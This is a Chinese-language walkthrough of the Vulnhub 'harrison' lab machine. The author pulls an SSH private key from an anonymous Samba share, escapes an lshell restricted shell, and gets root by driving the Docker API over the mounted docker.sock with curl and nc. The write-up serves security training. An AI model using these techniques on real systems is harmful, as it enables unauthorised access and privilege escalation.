Vulnhub之Harrison靶机详细测试过程(提权成功)

Harrison

作者:jason huawen

靶机信息

名称: SP: harrison

地址:

https://www.vulnhub.com/entry/sp-harrison,302/

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:19:b1:e6      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.125  08:00:27:a8:46:b3      1      60  PCS Systemtechnik GmbH        

利用Kali LInux的netdiscover工具识别目标主机的IP地址为192.168.56.125

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.125 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 19:19 EDT
Nmap scan report for bogon (192.168.56.125)
Host is up (0.000094s latency).
Not shown: 65533 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5b87f1fe678fa6ba8b753c11343db6b8 (RSA)
|   256 93877e2e5e4ece7156a11c6bfc1f6e55 (ECDSA)
|_  256 c014c024e8a87ed4cda64225f3484794 (ED25519)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:A8:46:B3 (Oracle VirtualBox virtual NIC)
Service Info: Host: HARRISON; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2023-04-23T07:19:44
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: harrison
|   NetBIOS computer name: HARRISON\x00
|   Domain name: \x00
|   FQDN: harrison
|_  System time: 2023-04-23T07:19:45+00:00
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds
                                                                

NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、445(samba)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ smbclient -L 192.168.56.125                                
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        Private         Disk      
        IPC$            IPC       IPC Service (Samba 4.7.6-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.125 failed (Error NT_STATUS_CONNECTION_REFUSED)
Unable to connect with SMB1 -- no workgroup available
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ smbclient //192.168.56.125/Private
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Apr 18 12:55:51 2019
  ..                                  D        0  Thu Apr 18 12:12:55 2019
  .bash_logout                        H      220  Wed Apr  4 14:30:26 2018
  .profile                            H      807  Wed Apr  4 14:30:26 2018
  .bashrc                             H     3771  Wed Apr  4 14:30:26 2018
  silly_cats                          D        0  Thu Apr 18 12:55:51 2019
  .ssh                               DH        0  Thu Apr 18 12:42:57 2019
  flag.txt                            N       32  Thu Apr 18 12:14:18 2019

                32894736 blocks of size 1024. 27322884 blocks available
smb: \> get flag.txt 
getting file \flag.txt of size 32 as flag.txt (15.6 KiloBytes/sec) (average 15.6 KiloBytes/sec)
smb: \> cd .ssh
smb: \.ssh\> ls
  .                                   D        0  Thu Apr 18 12:42:57 2019
  ..                                  D        0  Thu Apr 18 12:55:51 2019
  authorized_keys                     N      399  Thu Apr 18 12:42:57 2019
  id_rsa                              A     1679  Thu Apr 18 12:14:17 2019
  id_rsa.pub                          A      399  Thu Apr 18 12:14:17 2019

                32894736 blocks of size 1024. 27322884 blocks available
smb: \.ssh\> get id_rsa
getting file \.ssh\id_rsa of size 1679 as id_rsa (546.5 KiloBytes/sec) (average 334.2 KiloBytes/sec)
smb: \.ssh\> get id_rsa.pub 
getting file \.ssh\id_rsa.pub of size 399 as id_rsa.pub (194.8 KiloBytes/sec) (average 294.4 KiloBytes/sec)
smb: \.ssh\> get authorized_keys 
getting file \.ssh\authorized_keys of size 399 as authorized_keys (129.9 KiloBytes/sec) (average 245.0 KiloBytes/sec)
smb: \.ssh\> cd ..
smb: \> cd silly_cats\
smb: \silly_cats\> ls
  .                                   D        0  Thu Apr 18 12:55:51 2019
  ..                                  D        0  Thu Apr 18 12:55:51 2019
  cat3.jpg                            N    38624  Mon Jan  8 13:30:10 2018
  cat1.jpg                            N    73946  Mon Jan  8 13:29:40 2018
  cat2.jpg                            N    74130  Mon Jan  8 13:29:32 2018

                32894736 blocks of size 1024. 27322884 blocks available
smb: \silly_cats\> get cat1.jpg 
getting file \silly_cats\cat1.jpg of size 73946 as cat1.jpg (24070.2 KiloBytes/sec) (average 5743.3 KiloBytes/sec)
smb: \silly_cats\> get cat2.jpg 
getting file \silly_cats\cat2.jpg of size 74130 as cat2.jpg (24130.1 KiloBytes/sec) (average 9191.0 KiloBytes/sec)
smb: \silly_cats\> get cat3.jpg 
getting file \silly_cats\cat3.jpg of size 38624 as cat3.jpg (18858.5 KiloBytes/sec) (average 10265.2 KiloBytes/sec)
smb: \silly_cats\> quit

─(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ enum4linux 192.168.56.125    
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                  
                                                                                                                             
S-1-22-1-1000 Unix User\harrison (Local User)      

enum4linux识别出用户名harrison

┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ cat flag.txt     
It's not going to be that easy.

没那么容易?

                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ chmod 400 id_rsa  
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ ssh -i id_rsa harrison@192.168.56.125
The authenticity of host '192.168.56.125 (192.168.56.125)' can't be established.
ED25519 key fingerprint is SHA256:O+XKyphfQuB/KW9A8/6nUKPZTAGMJNtRBH8CrijPGnY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.125' (ED25519) to the list of known hosts.

Welcome to Harrison. Enjoy your shell.

Type '?' or 'help' to get the list of allowed commands
harrison:~$ id
*** forbidden command: id
harrison:~$ 

虽然得到了shell,但是这是受限的shell

┌──(kali㉿kali)-[~/Vulnhub/Harrison]
└─$ ssh -i id_rsa harrison@192.168.56.125 -t /bin/sh
*** forbidden shell escape: "/bin/sh"
This incident has been reported.
Connection to 192.168.56.125 closed.
                                                 

用-t选项指定不同的shell没能逃脱受限的Shell

harrison:~$ echo $SHELL
*** forbidden path: /usr/bin/lshell

可知为lshell

harrison:~$ echo && "bash"

harrison@harrison:~$ ls -alh
total 44K
drwxr-xr-x 1 harrison harrison 4.0K Apr 23 07:31 .
drwxr-xr-x 1 root     root     4.0K Apr 18  2019 ..
-rw-r--r-- 1 harrison harrison  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 harrison harrison 3.7K Apr  4  2018 .bashrc
drwx------ 2 harrison harrison 4.0K Apr 23 07:24 .cache
-rw------- 1 harrison harrison  272 Apr 23 07:31 .lhistory
-rw-r--r-- 1 harrison harrison  807 Apr  4  2018 .profile
drwxr-xr-x 1 harrison harrison 4.0K Apr 18  2019 .ssh
-rw-r--r-- 1 root     root       32 Apr 18  2019 flag.txt
drwxr-xr-x 2 root     root     4.0K Apr 18  2019 silly_cats
harrison@harrison:~$ cd /home
harrison@harrison:/home$ ls
harrison
harrison@harrison:/home$ 

用echo && "bash"逃逸,成为正常的shell

harrison@harrison:/root$ ls -alh
total 20K
drwxr-xr-x 1 root root 4.0K Apr 18  2019 .
drwxr-xr-x 1 root root 4.0K Apr 23 07:16 ..
-rw-r--r-- 1 root root 3.1K Apr  9  2018 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rwxr--r-- 1 root root   49 Apr 18  2019 flag.txt
harrison@harrison:/root$ cat flag.txt
Nope. No flags here. Where do you think you are?

提权

提权是通过docker实现的,但是过程太复杂了,是参考其他人的做法才能完成。

查看现有的容器

harrison@harrison:~$ cd /tmp

harrison@harrison:/tmp$ curl -XGET --unix-socket /var/run/docker.sock http://localhost/containers/json
[{"Id":"902f9eaf084a2da13ce02a097e80c39686c73c6af1ffcc78602c83dde49ae534","Names":["/nervous_proskuriakova"],"Image":"cont1:v1","ImageID":"sha256:6275c2bd4f72c6c417458fa6caecf2bc23bf823298650334c3c3bd42579aa95f","Command":"/bin/sh -c '/etc/init.d/smbd start && /etc/init.d/ssh start && bash' /bin/bash","Created":1682237761,"Ports":[{"IP":"0.0.0.0","PrivatePort":22,"PublicPort":22,"Type":"tcp"},{"IP":"0.0.0.0","PrivatePort":445,"PublicPort":445,"Type":"tcp"}],"Labels":{},"State":"running","Status":"Up 56 seconds","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"a81871ff28475882e034ea03bb1aab0b2ba4d0d1271312250f1db62337acc2b0","EndpointID":"01e3e3658c213f253bd4d957175f1007e23e6e4c2d9268e14d80a36512d531fb","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/var/run/docker.sock","Destination":"/var/run/docker.sock","Mode":"","RW":true,"Propagation":"rprivate"}]}]


创建新容器:

harrison@harrison:/tmp$ echo -e '{"Image":"ubuntu","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/root/","Target":"/os_root"}]}' > container.json


查看新创建的容器:

harrison@harrison:/tmp$ curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d "$(cat container.json)" http://localhost/containers/create
{"Id":"ea0a8e5839ab3e2817b02fb086a63a776f06afcd5a4f742eb5d8a898aae3719f","Warnings":null}


启动新容器:

harrison@harrison:/tmp$ curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/ea0a/start

连接新创建的容器:

harrison@harrison:/tmp$ nc -U /var/run/docker.sock
POST /containers/34b3/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp   

HTTP/1.1 404 Not Found
Content-Type: application/vnd.docker.raw-stream

No such container: 34b3
harrison@harrison:/tmp$ nc -U /var/run/docker.sock
POST /containers/ea0a/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp

HTTP/1.1 101 UPGRADED
Content-Type: application/vnd.docker.raw-stream
Connection: Upgrade
Upgrade: tcp

ls
]bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
os_root
proc
root
run
sbin
srv
sys
tmp
usr
var
cd os_root
ls -alh
�total 32K
drwx------ 3 root root 4.0K Apr 18  2019 .
drwxr-xr-x 1 root root 4.0K Apr 23 08:18 ..
-rw------- 1 root root  289 Apr 18  2019 .bash_history
-rw-r--r-- 1 root root 3.1K Apr  9  2018 .bashrc
drwxr-xr-x 3 root root 4.0K Apr 16  2019 .local
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw-r--r-- 1 root root   66 Apr 18  2019 .selected_editor
-rwx------ 1 root root   73 Apr 18  2019 flag.txt
cat flag.txt
IDo you think you are out?


Just kidding, here is your flag: 1xcDF933mce

注意这里所有的命令都需要保持容器ID一致

热门相关:仙城纪   刺客之王   大神你人设崩了   最强装逼打脸系统   横行霸道